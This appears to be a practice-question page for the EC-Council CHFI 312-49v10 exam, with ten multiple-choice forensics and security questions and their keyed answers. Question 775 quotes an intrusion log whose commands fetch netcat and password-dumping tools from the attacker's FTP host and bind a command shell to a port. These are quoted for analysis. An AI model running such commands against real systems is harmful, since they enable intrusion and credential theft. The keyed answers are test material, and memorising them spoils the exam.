EC-COUNCIL 312-49V10 Online Practice Questions and Exam Preparation

EC-COUNCIL 312-49V10 Online Questions & Answers

• Question 771:

  You work as an IT security auditor hired by a law firm in Boston to test whether you can gain access to sensitive information about the company clients. You have rummaged through their trash and found very little information. You do not want to set off any alarms on their network, so you plan on performing passive footprinting against their Web servers. What tool should you use?

  A. Dig
  B. Ping sweep
  C. Netcraft
  D. Nmap
  C. Netcraft

• Question 772:

  In a forensic examination of hard drives for digital evidence, what type of user is most likely to have the most file slack to analyze?

  A. one who has NTFS 4 or 5 partitions
  B. one who uses dynamic swap file capability
  C. one who uses hard disk writes on IRQ 13 and 21
  D. one who has lots of allocation units per block or cluster
  D. one who has lots of allocation units per block or cluster

• Question 773:

  You are asked to build a forensic lab and your manager has specifically informed you to use copper for lining the walls, ceilings, and floor. What is the main purpose of lining the walls, ceilings, and floor with copper?

  A. To control the room temperature
  B. To strengthen the walls, ceilings, and floor
  C. To avoid electromagnetic emanations
  D. To make the lab sound proof
  C. To avoid electromagnetic emanations

• Question 774:

  Netstat is a tool for collecting Information regarding network connections. It provides a simple view of TCP and UDP connections, and their state and network traffic statistics. Which of the following commands shows you the TCP and UDP network connections, listening ports, and the identifiers?

  A. netstat -ano
  B. netstat -b
  C. netstat -r
  D. netstat -s
  A. netstat -ano

• Question 775:

  The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213. 116. 251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in

  arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.

  He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that

  the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.

  "cmd1.exe /c open 213. 116. 251.162 >ftpcom"

  "cmd1.exe /c echo johna2k >>ftpcom"

  "cmd1.exe /c echo haxedj00 >>ftpcom"

  "cmd1.exe /c echo get nc.exe >>ftpcom"

  "cmd1.exe /c echo get pdump.exe >>ftpcom"

  "cmd1.exe /c echo get samdump.dll >>ftpcom"

  "cmd1.exe /c echo quit >>ftpcom"

  "cmd1.exe /c ftp -s:ftpcom"

  "cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

  What can you infer from the exploit given?

  A. It is a local exploit where the attacker logs in using username johna2k
  B. There are two attackers on the system - johna2k and haxedj00
  C. The attack is a remote exploit and the hacker downloads three files
  D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port
  C. The attack is a remote exploit and the hacker downloads three files

• Question 776:

  After passively scanning the network of Department of Defense (DoD), you switch over to active scanning to identify live hosts on their network. DoD is a large organization and should respond to any number of scans. You start an ICMP ping sweep by sending an IP packet to the broadcast address. Only five hosts responds to your ICMP pings; definitely not the number of hosts you were expecting.

  Why did this ping sweep only produce a few responses?

  A. Only IBM AS/400 will reply to this scan
  B. Only Windows systems will reply to this scan
  C. Only Unix and Unix-like systems will reply to this scan
  D. A switched network will not respond to packets sent to the broadcast address
  C. Only Unix and Unix-like systems will reply to this scan

• Question 777:

  An intrusion detection system (IDS) gathers and analyzes information from within a computer or a network to identify any possible violations of security policy, including unauthorized access, as well as misuse. Which of the following intrusion detection systems audit events that occur on a specific host?

  A. Network-based intrusion detection
  B. Host-based intrusion detection
  C. Log file monitoring
  D. File integrity checking
  B. Host-based intrusion detection

• Question 778:

  When investigating a wireless attack, what information can be obtained from the DHCP logs?

  A. The operating system of the attacker and victim computers
  B. IP traffic between the attacker and the victim
  C. MAC address of the attacker
  D. If any computers on the network are running in promiscuous mode
  C. MAC address of the attacker

• Question 779:

  What is the location of the binary files required for the functioning of the OS in a Linux system?

  A. /run
  B. /bin
  C. /root
  D. /sbin
  B. /bin

• Question 780:

  You have been asked to investigate the possibility of computer fraud in the finance department of a company. It is suspected that a staff member has been committing finance fraud by printing cheques that have not been authorized. You have

  exhaustively searched all data files on a bitmap image of the target computer, but have found no evidence. You suspect the files may not have been saved.

  What should you examine next in this case?

  A. The registry
  B. The swapfile
  C. The recycle bin
  D. The metadata
  B. The swapfile